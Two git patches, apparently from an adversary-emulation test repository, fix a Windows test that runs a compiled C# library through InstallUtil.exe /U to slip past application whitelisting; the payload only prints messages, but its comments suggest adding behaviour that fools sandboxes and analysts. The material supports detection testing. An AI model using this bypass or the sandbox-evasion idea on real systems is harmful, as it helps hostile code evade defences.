From 934bb78ea82691d7c56b3e3f14db6c8a5080e19a Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Mon, 7 May 2018 14:18:51 -0600 Subject: [PATCH 1/2] Fix --- Windows/Execution/InstallUtil.md | 2 +- Windows/Payloads/InstallUtilBypass.cs | 16 ++++++++-------- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/Windows/Execution/InstallUtil.md b/Windows/Execution/InstallUtil.md index 88c67472..5534fc11 100644 --- a/Windows/Execution/InstallUtil.md +++ b/Windows/Execution/InstallUtil.md @@ -8,7 +8,7 @@ Input: x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll - x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InastallUtilBypass.dll + x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll ## Test Script diff --git a/Windows/Payloads/InstallUtilBypass.cs b/Windows/Payloads/InstallUtilBypass.cs index 82f2de3d..c9f5437b 100644 --- a/Windows/Payloads/InstallUtilBypass.cs +++ b/Windows/Payloads/InstallUtilBypass.cs @@ -10,10 +10,10 @@ Author: Casey Smith, Twitter: @subTee License: BSD 3-Clause Step One: -C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs +C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe /target:library InstallUtilBypass.cs Step Two: -C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe +C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.dll */ @@ -24,11 +24,11 @@ public class Program { Console.WriteLine("Hey There From Main()"); //Add any behaviour here to throw off sandbox execution/analysts :) - //These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked + //These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked //by InstallUtil.exe - + } - + } [System.ComponentModel.RunInstaller(true)] @@ -37,9 +37,9 @@ public class Sample : System.Configuration.Install.Installer //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. public override void Uninstall(System.Collections.IDictionary savedState) { - + Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed."); - + } - + } From cb7f4a7923389a4c47cff29c95eab49b1e8fc148 Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Mon, 7 May 2018 14:20:16 -0600 Subject: [PATCH 2/2] Fix --- Windows/Payloads/InstallUtilBypass.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Windows/Payloads/InstallUtilBypass.cs b/Windows/Payloads/InstallUtilBypass.cs index c9f5437b..7279cdfb 100644 --- a/Windows/Payloads/InstallUtilBypass.cs +++ b/Windows/Payloads/InstallUtilBypass.cs @@ -38,7 +38,7 @@ public class Sample : System.Configuration.Install.Installer public override void Uninstall(System.Collections.IDictionary savedState) { - Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed."); + Console.WriteLine(@"Hello There From Uninstall, If you are reading this, prevention has failed.\n"); }